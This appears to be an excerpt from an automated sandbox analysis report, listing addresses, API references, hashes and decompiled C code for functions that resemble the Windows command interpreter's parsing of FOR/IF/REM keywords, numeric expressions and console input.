0x00340571
0x003404b1
0x003404bb
0x003404c1
0x003404c4
0x003404c6
0x003405f3
0x003405f3
0x00339a34
0x00339a36
0x00339a3c
0x00339a3d
0x00339a3e
0x00339a40
0x00351093
0x00351095
0x00351097
0x0035109d
0x0035109d
0x00339a48
0x00339a49
0x00339a58
0x00339a5c
0x00339a5d
0x00339a5f
0x003510a3
0x003510ab
0x003510ac
0x003510b2
0x003510b4
0x00339a65
0x00339a65
0x00339a65
0x00339a67
0x00339a67
0x00339a6e
0x00339a6f
0x00339a74
0x00339a76
0x003510bf
0x003510c3
0x00339a7c
0x00339a7c
0x00339a80
0x00339a89
0x00339a8a
0x00339a8c
0x00339a8e
0x00339a8e
0x00339a8f
0x00339a99
0x00339a9f
0x00339aa0
0x00339aa1
0x00339aa3
0x00000000
0x00000000
0x00339aa9
0x00339ab3
0x00339ab9
0x00339aba
0x00339abb
0x00339abd
0x00339c3b
0x00339c19
0x00339c19
0x00339c1b
0x00339a8f
0x00339a99
0x00339a9f
0x00339aa0
0x00339aa1
0x00339aa3
0x00000000
0x00000000
0x00000000
0x00339aa3
0x00000000
0x00339a8f
0x00339acd
0x00339ad3
0x00339ad4
0x00339ad5
0x00339ad7
0x00339bb9
0x00339bbd
0x00339bbf
0x00339bc4
0x00339bcc
0x00339bcd
0x00339bd0
0x00000000
0x00339bd6
0x00339bd8
0x00339bd9
0x00339bdc
0x00000000
0x00339be2
0x00339be2
0x00339be6
0x00339c46
0x00339c46
0x00339be8
0x00339bed
0x00339bf4
0x00339bf9
0x00339bfb
0x00000000
0x00339c01
0x00339c01
0x00339c07
0x00000000
0x00339c07
0x00339bfb
0x00339bdc
0x00000000
0x00339add
0x00339ae7
0x00339aed
0x00339aee
0x00339aef
0x00339af2
0x00339af4
0x003510d1
0x003510d4
0x003510d6
0x003510db
0x003510df
0x003510e1
0x003510e1
0x003510e6
0x003510ee
0x003510ef
0x003510f2
0x00000000
0x003510f8
0x003510fa
0x003510fb
0x003510fe
0x00000000
0x00351104
0x00351104
0x00351109
0x00351110
0x00351115
0x00351117
0x00351127
0x00351127
0x00351132
0x00000000
0x00351119
0x00351119
0x0035111f
0x00339c0a
0x00339c0f
0x00339c11
0x00339c14
0x00000000
0x00339c14
0x00351117
0x003510fe
0x00000000
0x00339afa
0x00339afa
0x00339afc
0x00339afe
0x00339b01
0x00339c25
0x00339c28
0x00339c2e
0x00339c30
0x00351138
0x00351138
0x0035113b
0x00351141
0x00351144
0x0035114a
0x0035114a
0x00351144
0x0035113b
0x00339c30
0x00339c28
0x00339b01
0x00339afc
0x00339af4
0x00339b09
0x00000000
0x00339c41
0x00339c41
0x00000000
0x00339c41
0x00339a8f
0x00339b0a
0x00339b0a
0x00339b11
0x00351154
0x00351154
0x00339b17
0x00339b17
0x00339b1f
0x00339b25
0x00339b26
0x00339b28
0x00000000
0x00339b2e
0x00339b2e
0x00339b35
0x00339b3a
0x00339b3d
0x00339b42
0x00339b44
0x00000000
0x00339b4a
0x00339b4a
0x00339b51
0x00000000
0x00000000
0x00339b51
0x00339b44
0x00339b28
0x00339b57
0x00339b5a
0x00339b5f
0x00339b60
0x00339b63
0x00339b64
0x00339b69
0x00339b6e
0x00339b73
0x00339b76
0x00339b77
0x00339b7a
0x00339b7b
0x00339b80
0x00339b85
0x00339b8a
0x00339b8d
0x00339b92
0x00339b95
0x00339b98
0x00339b9b
0x00339b9c
0x00339ba3
0x00339ba4
0x00339ba9
0x00339bac
0x00339bae
0x0035115e
0x0035115e
0x00339bae
0x00339bb4
0x00339bb5
0x00339bb7
0x00339bb8
0x003404cc
0x003404d6
0x003404dc
0x003404df
0x003404e1
0x00000000
0x003404e7
0x003404f1
0x003404f7
0x003404fa
0x003404fc
0x003405d4
0x003405d4
0x0033d812
0x0033d814
0x0033d81a
0x0033d81b
0x0033d81c
0x0033d81e
0x0034b9cb
0x0034b9cd
0x0034b9cf
0x0034b9d5
0x0034b9d5
0x0033d826
0x0033d82c
0x0033d82e
0x0033d830
0x0034b9dd
0x0034b9de
0x0034b9e6
0x0034b9e7
0x0034b9ed
0x0034b9ef
0x0033d836
0x0033d836
0x0033d836
0x0033d838
0x0033d838
0x0033d83f
0x0033d840
0x0033d845
0x0033d847
0x0034b9fa
0x0034b9fe
0x00000000
0x0033d84d
0x0033d84d
0x0033d84f
0x0033d855
0x0033d871
0x0033d873
0x0033d875
0x0033d875
0x0033d877
0x0033d857
0x0033d861
0x0033d867
0x0033d868
0x0033d869
0x0033d86b
0x0033d919
0x0033d91b
0x00000000
0x00000000
0x00000000
0x0033d86b
0x0033d87c
0x0033d87e
0x0033d883
0x0033d886
0x0033d888
0x0033d88a
0x0033d88c
0x0033d921
0x0033d924
0x0033d932
0x0033d932
0x0033d926
0x0033d926
0x0033d88c
0x0033d894
0x0033d895
0x0033d89a
0x0033d89d
0x0033d89f
0x0034ba09
0x0034ba09
0x0033d8a5
0x0033d8aa
0x0033d8ac
0x0033d8d7
0x0033d8d7
0x0033d8d8
0x0033d8da
0x0033d8db
0x0033d8dc
0x0033d8ae
0x0033d8ae
0x0033d8b0
0x0033d8b5
0x0033d8c0
0x0033d8c6
0x0033d8c7
0x0033d8c8
0x0033d8ca
0x0033d8dd
0x0033d8e2
0x0033d8e5
0x0033d8ea
0x0033d8ec
0x0034ba13
0x0034ba1f
0x0034ba25
0x0034ba26
0x0034ba26
0x0034ba26
0x0034ba28
0x0033da46
0x0033da46
0x0033da49
0x0033da4b
0x0033da4d
0x00000000
0x00000000
0x0033d9f1
0x0033d9f4
0x0033d9f6
0x0033d9f9
0x0033d9f9
0x0033d9fc
0x0033d9ff
0x0033d9ff
0x0033da04
0x0033da06
0x0033da08
0x0033da0d
0x0033da10
0x0033da14
0x0033da19
0x0033da1c
0x0033da1e
0x0033da21
0x0033da23
0x0033da26
0x0033da26
0x0033da29
0x0033da2c
0x0033da2c
0x0033da31
0x0033da33
0x0033da35
0x0033da36
0x0033da39
0x0033da3b
0x0033da40
0x00000000
0x00000000
0x0033da40
0x0033da39
0x0033da1c
0x0033da4f
0x0033da55
0x0033da5b
0x0033da5e
0x0034ba31
0x0034ba36
0x00000000
0x0033da64
0x0033da66
0x0033da67
0x0033da6c
0x0033da72
0x0033da74
0x0033db8d
0x0033db8d
0x0033db8f
0x0033da7a
0x0033da7a
0x0033da80
0x0033da83
0x0033da88
0x0033da8b
0x0033da8d
0x0033da8d
0x0033da90
0x0033da92
0x0033da98
0x0033da98
0x0033da9b
0x0033da9b
0x0033da9e
0x00000000
0x0033daa4
0x0033daa6
0x0033daac
0x0033daad
0x0033daaf
0x0034ba90
0x0034ba90
0x00000000
0x0033dab5
0x0033dab7
0x0033dabd
0x0033dabe
0x0033dac1
0x00000000
0x0033dac7
0x0033dac7
0x0033dac9
0x0033dace
0x0033dad0
0x0034ba41
0x0034ba43
0x0034ba48
0x0034ba4a
0x00000000
0x0034ba50
0x0034ba56
0x0034ba5c
0x0034ba5e
0x0034ba64
0x0034ba66
0x00000000
0x0034ba6c
0x0034ba6e
0x0034ba7e
0x0034ba83
0x0034ba84
0x0034ba86
0x00000000
0x0034ba86
0x0034ba66
0x0033dad6
0x0033dad6
0x0033dad6
0x0033dad8
0x0033dadd
0x0033dae0
0x0033dae2
0x0034bb26
0x0034bb36
0x0034bb3b
0x0034bb3c
0x0034bb3e
0x0034bb43
0x0034bb43
0x0034bb48
0x0034bb4b
0x0034bb4e
0x00000000
0x0033dae8
0x0033dae8
0x0033daea
0x0033daef
0x0033daef
0x0033daf2
0x0033daf6
0x0033db6d
0x0033db6f
0x0033db73
0x0033db76
0x0033db78
0x0033db7c
0x0033db7f
0x0033db84
0x0033db86
0x00000000
0x0033db88
0x00000000
0x0033db88
0x0033daf8
0x0033daf8
0x0033dafd
0x0033dafe
0x0034ba98
0x0034ba9d
0x0034baa2
0x0034baa8
0x0034baaa
0x00000000
0x0034bab0
0x0034bab0
0x0034bab5
0x0034baba
0x0034babc
0x00000000
0x0034bac2
0x0034bac2
0x0034bac5
0x0034bac7
0x0034bac9
0x0034bac9
0x0034bad9
0x0034badf
0x0034bae1
0x00000000
0x0034bae7
0x0034bae7
0x0034baea
0x0034baec
0x0034baee
0x0034baee
0x0034baf4
0x0034baf5
0x00000000
0x0034baf5
0x0034bae1
0x0034babc
0x0033db04
0x0033db07
0x0033db09
0x0033db0b
0x0033db11
0x0033db11
0x0033db17
0x0033db17
0x0033db1c
0x0033db22
0x0033db24
0x0034bb89
0x0034bb89
0x0034bb8e
0x0034bb94
0x00000000
0x0033db2a
0x0033db2a
0x0033db2a
0x0033db2c
0x0034baff
0x0034bb01
0x0034bb03
0x0034bb08
0x0034bb0e
0x0034bb10
0x0034bb15
0x0034bb18
0x0034bb58
0x0034bb58
0x0034bb5f
0x0034bb7c
0x00000000
0x0034bb1a
0x0034bb1a
0x0034bb1c
0x00000000
0x0034bb1c
0x0033db32
0x0033db32
0x0033db32
0x0033db34
0x00000000
0x0033db3a
0x0033db3a
0x0033db40
0x00000000
0x0033db40
0x0033db34
0x0033db2c
0x0033db24
0x0033dafe
0x0033daf6
0x0033dae2
0x0033dad0
0x0033dac1
0x0033daaf
0x00000000
0x0033db43
0x0033db43
0x0033db46
0x0033db48
0x0033db48
0x0033da9b
0x0033da92
0x0033da74
0x0033db50
0x0033db53
0x0033db59
0x0033db5a
0x0033db5d
0x0033db5f
0x0033db60
0x0033db61
0x0033db61
0x0033db63
0x0033db64
0x0033db69
0x0033db6b
0x0033db6c
0x00000000
0x0033db6c
0x0033d8f2
0x0033d8f2
0x0033d8f8
0x0033d8fb
0x0033d8fe
0x0033d905
0x0033d906
0x0033d90b
0x0033d90e
0x0033d910
0x0033d912
0x0033d912
0x00000000
0x0033d910
0x0033d8cc
0x0033d8ce
0x0033d8d0
0x0033d8d0
0x0033d8d2
0x00000000
0x0033d8d2
0x0033d8ca
0x0033d8ac
0x00340502
0x0034050c
0x00340512
0x00340515
0x00340517
0x00000000
0x0034051d
0x00340527
0x0034052d
0x00340530
0x00340532
0x00340551
0x00340551
0x0033de5e
0x0033de60
0x0033de66
0x0033de67
0x0033de68
0x0033de6a
0x0034bca8
0x0034bcaa
0x0034bcac
0x0034bcb2
0x0034bcb2
0x0033de72
0x0033de78
0x0033de7a
0x0033de7c
0x0034bcba
0x0034bcbb
0x0034bcc3
0x0034bcc4
0x0034bcca
0x0034bccc
0x0033de82
0x0033de82
0x0033de82
0x0033de84
0x0033de84
0x0033de8b
0x0033de8c
0x0033de91
0x0033de93
0x0034bcd7
0x0034bcdb
0x00000000
0x0033de99
0x0033de9b
0x0033de9d
0x0033de9f
0x0033dea4
0x0033dea9
0x0033deab
0x0033dee6
0x0033dee6
0x0033dee7
0x0033dee9
0x0033deea
0x0033deeb
0x0033dead
0x0033deaf
0x0033deb0
0x0033deb5
0x0033deba
0x0033deee
0x0033def0
0x0033def2
0x00000000
0x0033debc
0x0033debc
0x0033dec1
0x0033dec4
0x0033dec9
0x0033decb
0x0034bce6
0x0034bcf2
0x0034bcf8
0x0034bcf9
0x0034bcfb
0x0034bd01
0x0034bd03
0x0034bd03
0x0033dfb0
0x0033dfb1
0x0033dfb2
0x0033dfb4
0x0033dfb5
0x0033ded1
0x0033ded1
0x0033ded7
0x0033dede
0x0033dee1
0x00000000
0x0033dee1
0x0033decb
0x0033deba
0x0033deab
0x00340534
0x0034053e
0x00340544
0x00340547
0x00340549
0x00000000
0x0034054b
0x0034054b
0x0033ed82
0x0033ed83
0x0033ed85
0x0033ed88
0x0033ed89
0x0033ed8a
0x0033ed8d
0x0033ed94
0x0033ed95
0x0033ed95
0x0033ed97
0x0033ed9f
0x0033eda1
0x0033eda4
0x0033eda4
0x0033eda9
0x0033edab
0x00000000
0x00000000
0x0033edad
0x0033edb2
0x0033edb7
0x0033edbc
0x0033ede9
0x0033edec
0x0033edf2
0x0033edf4
0x0034c0ad
0x0034c0b0
0x0034c0b0
0x0034c0b3
0x0034c0b6
0x0034c0b6
0x0034c0bb
0x0034c0bf
0x0034c0bf
0x0033edfa
0x0033ee02
0x0033ee04
0x0033ee07
0x0033ee09
0x0034c0f7
0x0034c103
0x0034c109
0x0034c10a
0x0034c111
0x0034c117
0x0034c117
0x0033efe1
0x0033efe1
0x0033efe3
0x0033efea
0x0033efef
0x0034c121
0x0034c123
0x0034c125
0x0034c125
0x0033eff5
0x0033eff7
0x0033eff8
0x0033eff9
0x0033effa
0x0033effb
0x0033ee0f
0x0033ee0f
0x0033ee12
0x0033ee14
0x0034c0c7
0x0034c0c9
0x0034c0cb
0x0034c0cb
0x0033ee1a
0x0033ee1c
0x0033ee1e
0x0034c0d5
0x0034c0d5
0x0033ee24
0x0033ee24
0x0033ee2a
0x00000000
0x00000000
0x0033ee2a
0x0033ee30
0x0033ee32
0x0034c0f0
0x0034c0f0
0x0033ee38
0x0033ee38
0x0033ee3a
0x0033ee3c
0x0033ee3e
0x0033ee40
0x0034c0eb
0x0034c0eb
0x00000000
0x0033ee46
0x0033ee46
0x0033ee46
0x0033ee49
0x00000000
0x00000000
0x0034c0df
0x0034c0e2
0x0034c0e2
0x0034c0e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0034c0e5
0x0033ee4f
0x0033ee51
0x00000000
0x0033ee57
0x0033ee57
0x0033ee59
0x0033ee59
0x0033ee59
0x0033ee51
0x0033ee40
0x0033ee5b
0x0033ee5b
0x0033ee5d
0x0033ee5f
0x0033ee62
0x0033ee64
0x0033ee67
0x0033ee67
0x0033ee69
0x0033ee99
0x0033ee99
0x0033ee6b
0x0033ee6b
0x0033ee6d
0x0033ee73
0x0033ee75
0x0033ee7a
0x0033ee7c
0x0033ee7c
0x0033ee80
0x0033ee80
0x0033ee82
0x00000000
0x00000000
0x0033ee84
0x0033ee88
0x0033ee8b
0x00000000
0x0033ee8d
0x0033ee8d
0x0033ee90
0x0033ee91
0x0033ee94
0x0033ee94
0x0033ee97
0x00000000
0x00000000
0x00000000
0x00000000
0x0033ee97
0x00000000
0x0033ee8b
0x0033ee9e
0x0033eea0
0x00000000
0x00000000
0x0033eea0
0x0033eea2
0x0033eea2
0x0033eea5
0x0033eea5
0x0033eea7
0x0033eea7
0x0033eeaa
0x00000000
0x0033eeaa
0x0033edbe
0x0033edbe
0x0033edc1
0x0033edc3
0x0033edc8
0x0033edca
0x0033eeb2
0x0033eeb4
0x0033eeb4
0x0033eeb4
0x0033eeb7
0x0033eeb9
0x0033eebc
0x0033eebc
0x0033eec0
0x00000000
0x0033edd0
0x0033edd1
0x0033edd3
0x0033edd3
0x0033edd5
0x00000000
0x0033edd5
0x0033edca
0x00000000
0x0033edbc
0x0033edda
0x0033eddd
0x0033edde
0x0033ede1
0x0033ede3
0x0033ede4
0x0033ede5
0x0033ede7
0x0033ede8
0x0033ede8
0x00340549
0x00340532
0x00340517
0x003404fc
0x003404e1
0x003404c6
0x00000000

APIs

_wcsicmp.MSVCRT ref: 003404BB
_wcsicmp.MSVCRT ref: 003404D6
_wcsicmp.MSVCRT ref: 003404F1
_wcsicmp.MSVCRT ref: 0034050C
_wcsicmp.MSVCRT ref: 00340527
_wcsicmp.MSVCRT ref: 0034053E

Strings

REM, xrefs: 00340522
IF/?, xrefs: 00340507
FOR, xrefs: 003404B6
REM/?, xrefs: 00340539
FOR/?, xrefs: 003404D1

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: FOR$FOR/?$IF/?$REM$REM/?
API String ID: 2081463915-3874590324
Opcode ID: 6381122d4b8ba8c3666e23cb2efe1ceb2e6468b059a3eddec4eae99092c461a6
Instruction ID: fad7ab14a0137eabe999cc89df520ab4356338998815c6c8bf0b71197e0ca1bd
Opcode Fuzzy Hash: 6381122d4b8ba8c3666e23cb2efe1ceb2e6468b059a3eddec4eae99092c461a6
Instruction Fuzzy Hash: D9314934B442018EDB2B67B4FC463AA22D8DB01742F05C17AE68BDD2D0DEF0A585CE55

Uniqueness

Uniqueness Score: -1.00%

Function 003364DC, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E003364DC(void* __eflags, char _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v28;
				signed short* _t39;
				short* _t45;
				int _t50;
				wchar_t* _t54;
				long _t55;
				long _t62;
				signed int _t71;

				E00339794( &_a8);
				_t39 = _a8;
				_t62 =  *_t39 & 0x0000ffff;
				if(_t62 == 0) {
					L22:
					_a16 = 0x400023cd;
					L9:
					L10:
					_t9 =  &_a4; // 0x336463
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return  *_t9;
				}
				if(_t62 == 0x28) {
					_a8 =  &(_t39[1]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E00336355();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						L21:
						goto L10;
					}
					E00339794( &_a8);
					_t45 = _a8;
					__eflags =  *_t45 - 0x29;
					if( *_t45 != 0x29) {
						_a16 = 0x400023cc;
					} else {
						_a8 = _t45 + 2;
					}
					goto L9;
				}
				if(wcschr(L"+-~!", _t62) != 0) {
					_a8 =  &(_a8[0]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E003364DC(__eflags);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						goto L21;
					}
					E00334409( &_a8, _t62, _a12);
					goto L9;
				}
				_t50 = iswdigit(_t62);
				if(_t50 == 0) {
					_t11 =  &_v12; // 0x336463
					__eflags = E00336785( &_a8, _t11, __eflags,  &_v8);
					if(__eflags == 0) {
						goto L22;
					} else {
						_a12 = E003360DE(_v8, __eflags);
						goto L9;
					}
				}
				__imp___errno();
				 *_t50 = 0;
				_t54 = _a8;
				if( *_t54 == 0x30) {
					_t71 = _t54[0] & 0x0000ffff;
					__eflags = _t71 - 0x78;
					if(_t71 == 0x78) {
						L24:
						_t55 = wcstoul(_t54,  &_a8, 0);
						L6:
						_a12 = _t55;
						if(_t55 == 0x7fffffff) {
							__imp___errno();
							__eflags =  *_t55 - 0x22;
							if( *_t55 != 0x22) {
								goto L7;
							}
							_a16 = 0x400023d0;
							goto L9;
						}
						L7:
						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
							_a16 = 0x400023cf;
						}
						goto L9;
					}
					__eflags = _t71 - 0x58;
					if(_t71 != 0x58) {
						goto L5;
					}
					goto L24;
				}
				L5:
				_t55 = wcstol(_t54,  &_a8, 0);
				goto L6;
			}

0x003364ea
0x003364ef
0x003364f2
0x003364f8
0x0034ac90
0x0034ac90
0x00336589
0x0033658c
0x0033658c
0x00336591
0x00336592
0x00336593
0x0033659a
0x0033659a
0x00336501
0x003365cf
0x003365d5
0x003365d6
0x003365d7
0x003365d8
0x003365d9
0x003365e3
0x003365e4
0x003365e5
0x003365e6
0x003365ea
0x0033665c
0x00000000
0x0033665c
0x003365ef
0x003365f4
0x003365f7
0x003365fb
0x0034ac9c
0x00336601
0x00336604
0x00336604
0x00000000
0x003365fb
0x00336517
0x00336624
0x00336633
0x00336634
0x00336635
0x00336636
0x00336637
0x00336641
0x00336642
0x00336643
0x00336644
0x00336648
0x00000000
0x00000000
0x00336652
0x00000000
0x00336652
0x0033651e
0x00336527
0x003365a1
0x003365ac
0x003365ae
0x00000000
0x003365b4
0x003365bf
0x00000000
0x003365bf
0x003365ae
0x00336529
0x00336531
0x00336533
0x0033653a
0x00336609
0x0033660d
0x00336610
0x0034aca8
0x0034acae
0x0033654c
0x0033654f
0x00336557
0x0034acb9
0x0034acbf
0x0034acc2
0x00000000
0x00000000
0x0034acc8
0x00000000
0x0034acc8
0x0033655d
0x0033656d
0x0034acd4
0x0034acd4
0x00000000
0x0033656d
0x00336616
0x00336619
0x00000000
0x00000000
0x00000000
0x0033661f
0x00336540
0x00336546
0x00000000

APIs

wcschr.MSVCRT ref: 0033650D
iswdigit.MSVCRT ref: 0033651E
_errno.MSVCRT ref: 00336529
wcstol.MSVCRT ref: 00336546
iswdigit.MSVCRT ref: 00336564
iswalpha.MSVCRT ref: 0033657A
wcstoul.MSVCRT ref: 0034ACAE
_errno.MSVCRT ref: 0034ACB9

Strings

+-~!, xrefs: 00336508
cd3, xrefs: 0033658C
cd3, xrefs: 003365A1, 003365B7

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
String ID: +-~!$cd3$cd3
API String ID: 2191331888-1265790953
Opcode ID: 017b5cd7a1c61791cc64a8294fa12d3352300c7c75eac36d1095c220b354d555
Instruction ID: 53d935111928f0cc62c5fa6fe91692b3c30d413c90d86b2b801dc88f432ee04b
Opcode Fuzzy Hash: 017b5cd7a1c61791cc64a8294fa12d3352300c7c75eac36d1095c220b354d555
Instruction Fuzzy Hash: 8D518E75500609EFDB12DF64D886AAA37A9EF06321F11C12AFC169F580E774DE44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0035474C, Relevance: 18.2, APIs: 12, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0035474C(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v2060;
				char _v2061;
				char _v2062;
				signed int _v2068;
				long _v2072;
				long _v2076;
				void* _v2080;
				intOrPtr _v2088;
				signed int _t36;
				long* _t38;
				void* _t40;
				signed int _t43;
				long _t44;
				wchar_t* _t45;
				void* _t48;
				void* _t49;
				void* _t53;
				void* _t58;
				signed int _t60;
				void* _t61;
				intOrPtr _t63;
				wchar_t* _t70;
				long _t71;
				wchar_t* _t72;
				wchar_t* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t89;
				void* _t102;
				long _t103;
				wchar_t* _t104;
				void* _t106;
				wchar_t* _t107;
				signed int _t108;

				_t99 = __edx;
				_t36 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t36 ^ _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v2061 = 0;
				_v2062 = 0;
				_t38 = E0033DF40(__ecx);
				if(_t38 == 0) {
					L3:
					_t40 = 1;
					goto L4;
				} else {
					_t82 = _t38;
					_t107 = E00342430(_t38);
					_t43 =  *_t107 & 0x0000ffff;
					if(_t43 != 0) {
						_t103 = 0x22;
						if(_t43 == _t103) {
							_t5 =  &(_t107[0]); // 0x2
							_t107 = E00342430(_t5);
							_t74 = wcsrchr(_t107, _t103);
							if(_t74 != 0) {
								 *_t74 = 0;
							}
						}
						_t44 = 0x3d;
						_t45 = wcschr(_t107, _t44);
						_pop(_t82);
						if(_t45 == 0) {
							goto L2;
						} else {
							 *_t45 = 0;
							_t6 =  &(_t45[0]); // 0x2
							_t82 = _t6;
							_t104 = E00342430(_t6);
							_t48 = 0x22;
							if( *_t104 == _t48) {
								_t7 =  &(_t104[0]); // 0x2
								_t70 = E00342430(_t7);
								_t104 = _t70;
								_t71 = 0x22;
								_t72 = wcsrchr(_t104, _t71);
								_pop(_t82);
								if(_t72 != 0) {
									_t82 = 0;
									 *_t72 = 0;
								}
							}
							_t49 = 0x3d;
							if( *_t104 == _t49) {
								goto L2;
							} else {
								_t78 = GetStdHandle(0xfffffff5);
								if(GetConsoleMode(_t78,  &_v2072) != 0) {
									_v2061 = 1;
									SetConsoleMode(_t78, _v2072 | 0x00000001);
								}
								_t53 = GetStdHandle(0xfffffff6);
								_t87 =  &_v2076;
								_v2080 = _t53;
								if(GetConsoleMode(_t53,  &_v2076) != 0) {
									_t87 = _v2076 | 0x00000007;
									_v2062 = 1;
									SetConsoleMode(_v2080, _v2076 | 0x00000007);
								}
								E0033C108(_t87, 0x2371, 1, _t104);
								_v2060 = 0;
								_t58 = GetStdHandle(0xfffffff6);
								_t99 =  &_v2060;
								_t88 = _t58;
								if(E00353B11(_t58,  &_v2060, 0x3ff,  &_v2068) == 0) {
									L23:
									_t60 = 0;
									_v2068 = 0;
								} else {
									_t60 = _v2068;
									if(_t60 == 0) {
										goto L23;
									} else {
										_t88 = _t108 + _t60 * 2 - 0x80a;
										while( *_t88 < 0x20) {
											_t60 = _t60 - 1;
											_t88 = _t88 - 2;
											_v2068 = _t60;
											if(_t60 != 0) {
												continue;
											} else {
											}
											goto L24;
										}
									}
								}
								L24:
								if(_v2061 != 0) {
									SetConsoleMode(_t78, _v2072);
									_t60 = _v2068;
								}
								if(_v2062 != 0) {
									SetConsoleMode(_v2080, _v2076);
									_t60 = _v2068;
								}
								if(_t60 == 0) {
									goto L3;
								} else {
									_t61 = _t60 + _t60;
									if(_t61 >= 0x800) {
										E0034711D(_t61, _t78, _t88, _t99, _t104, _t107);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t108);
										_t89 = _v2088;
										if( *0x35d5fc == 2) {
											_t63 = E003546A5(_t89, 0);
											L35:
											 *0x36b8b0 = _t63;
											return _t63;
										}
										_t63 = E003546A5(_t89, 0);
										if(_t63 != 0) {
											goto L35;
										}
										return _t63;
									} else {
										_t99 =  &_v2060;
										 *((short*)(_t108 + _t61 - 0x808)) = 0;
										_t40 = E00343A50(_t107,  &_v2060);
										L4:
										_pop(_t102);
										_pop(_t106);
										_pop(_t77);
										return E00346FD0(_t40, _t77, _v8 ^ _t108, _t99, _t102, _t106);
									}
								}
							}
						}
					} else {
						L2:
						_push(0);
						_push(0x232a);
						E0033C5A2(_t82);
						goto L3;
					}
				}
			}

0x0035474c
0x00354757
0x0035475e
0x00354761
0x00354762
0x00354765
0x00354766
0x0035476c
0x00354772
0x00354779
0x00354799
0x0035479b
0x00000000
0x0035477b
0x0035477b
0x00354782
0x00354784
0x0035478a
0x003547af
0x003547b3
0x003547b5
0x003547bd
0x003547c1
0x003547cb
0x003547cf
0x003547cf
0x003547cb
0x003547d4
0x003547d7
0x003547de
0x003547e1
0x00000000
0x003547e3
0x003547e5
0x003547e8
0x003547e8
0x003547f0
0x003547f4
0x003547f8
0x003547fa
0x003547fd
0x00354804
0x00354806
0x00354809
0x00354810
0x00354813
0x00354815
0x00354817
0x00354817
0x00354813
0x0035481c
0x00354820
0x00000000
0x00354826
0x0035482e
0x00354840
0x0035484b
0x00354854
0x00354854
0x0035485c
0x00354862
0x00354868
0x00354878
0x00354880
0x00354883
0x00354891
0x00354891
0x0035489f
0x003548a9
0x003548be
0x003548c4
0x003548ca
0x003548d3
0x003548fc
0x003548fc
0x003548fe
0x003548d5
0x003548d5
0x003548dd
0x00000000
0x003548df
0x003548df
0x003548e6
0x003548ec
0x003548ed
0x003548f0
0x003548f8
0x00000000
0x00000000
0x003548fa
0x00000000
0x003548f8
0x003548e6
0x003548dd
0x00354904
0x0035490b
0x00354914
0x0035491a
0x0035491a
0x00354927
0x00354935
0x0035493b
0x0035493b
0x00354943
0x00000000
0x00354949
0x00354949
0x00354950
0x0035496e
0x00354973
0x00354974
0x00354975
0x00354976
0x00354977
0x00354978
0x00354979
0x0035497a
0x0035497b
0x0035497c
0x0035497d
0x0035497e
0x0035497f
0x00354982
0x00354985
0x00354991
0x0035499e
0x003549a3
0x003549a3
0x00000000
0x003549a3
0x00354993
0x0035499a
0x00000000
0x0035499c
0x003549a9
0x00354952
0x00354954
0x0035495a
0x00354964
0x0035479c
0x0035479f
0x003547a0
0x003547a3
0x003547ac
0x003547ac
0x00354950
0x00354943
0x00354820
0x0035478c
0x0035478c
0x0035478c
0x0035478d
0x00354792
0x00000000
0x00354798
0x0035478a

APIs

Part of subcall function 00342430: iswspace.MSVCRT ref: 00342440

wcsrchr.MSVCRT ref: 003547C1
wcschr.MSVCRT ref: 003547D7
wcsrchr.MSVCRT ref: 00354809
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00354828
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00354838
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00354854
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0035485C
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00354870
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00354891
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 003548BE
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00354914
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00354935

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
String ID:
API String ID: 4166807220-0
